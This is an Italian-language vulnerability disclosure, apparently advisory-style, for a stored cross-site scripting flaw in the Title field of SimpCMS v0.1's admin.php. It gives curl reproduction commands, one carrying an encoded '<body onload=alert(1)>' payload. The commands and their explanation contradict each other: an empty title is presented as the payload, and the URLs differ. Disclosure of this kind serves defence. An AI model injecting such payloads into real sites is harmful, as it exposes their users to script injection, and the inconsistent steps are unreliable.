
Pubblicazione per Cross-Site Scripting (XSS) in SimpCMS v0.1 - /SimpCMS/admin.php
Una vulnerabilità di cross-site scripting (XSS) in SimpCMS v0.1 consente agli attaccanti di eseguire script web arbitrari o HTML tramite un payload manipolato iniettato nel campo Title su /admin.php.
Dopo aver effettuato l'accesso all'interfaccia di amministrazione di SimpCMS, copia i rispettivi valori dei Cookie osservati nella scheda Application dell'elemento Inspect del browser e invia la seguente richiesta curl:
curl -X POST "http://site.com/SimpCMS/admin/index.php" -d "title=&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0"


I parametri iniziali osservati per il software SimpCMS hanno prodotto il seguente comando cURL, ma successivamente aggiornato:
curl -X POST "http://site.com/SimpCMS/admin.php" -d "title=%3Cbody+onload%3Dalert%281%29%3E&text=ee&cat=something&main=1&submit=submit" -b "username=admin; password=PARAMVALUE"
Spiegazione:
- curl: lo strumento a riga di comando per trasferire dati con URL.
- -X POST: specifica il metodo di richiesta da utilizzare (POST).
- "http://site.com/SimpCMS/admin.php": l'URL a cui viene inviata la richiesta.
- -d "title=&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0" - Il payload della richiesta POST.
Esegui questo comando nel tuo terminale per inviare la richiesta POST con il payload XSS. Visita il sito principale /SimpCMS e l'XSS sarà visibile.